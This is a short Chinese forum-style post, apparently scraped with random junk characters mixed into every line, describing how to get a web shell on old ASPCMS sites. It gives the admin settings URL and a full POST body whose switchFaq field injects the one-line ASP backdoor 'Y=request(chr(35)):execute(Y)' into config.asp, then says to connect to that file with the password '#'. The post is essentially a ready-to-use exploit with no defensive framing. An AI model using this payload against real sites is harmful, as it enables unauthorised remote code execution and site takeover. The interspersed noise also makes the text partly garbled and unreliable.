老的ASPCMS版本的秒杀拿SHELL漏洞
3 W2 e! z! o. c# U
: x! N5 L+ U8 d! _9 m1 t- W 找到后台。。。然后3 _$ h- S) ?& G; n1 s
& r: ]/ ~6 }& }, I, g
/admin/_system/AspCms_SiteSetting.asp?action=saves6 b( t, n) u; O
# W# {2 | l: e9 x( [4 j直接POST5 j3 M$ F8 s: e, r% l! Q
$ u. C4 f# i/ K% t1 @ J
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
9 J' a& @( ~" H& J" o: o; F
; _8 A4 R& u) z再连接配置文件config.asp 密码为## e9 m, w) O: L. M2 d
|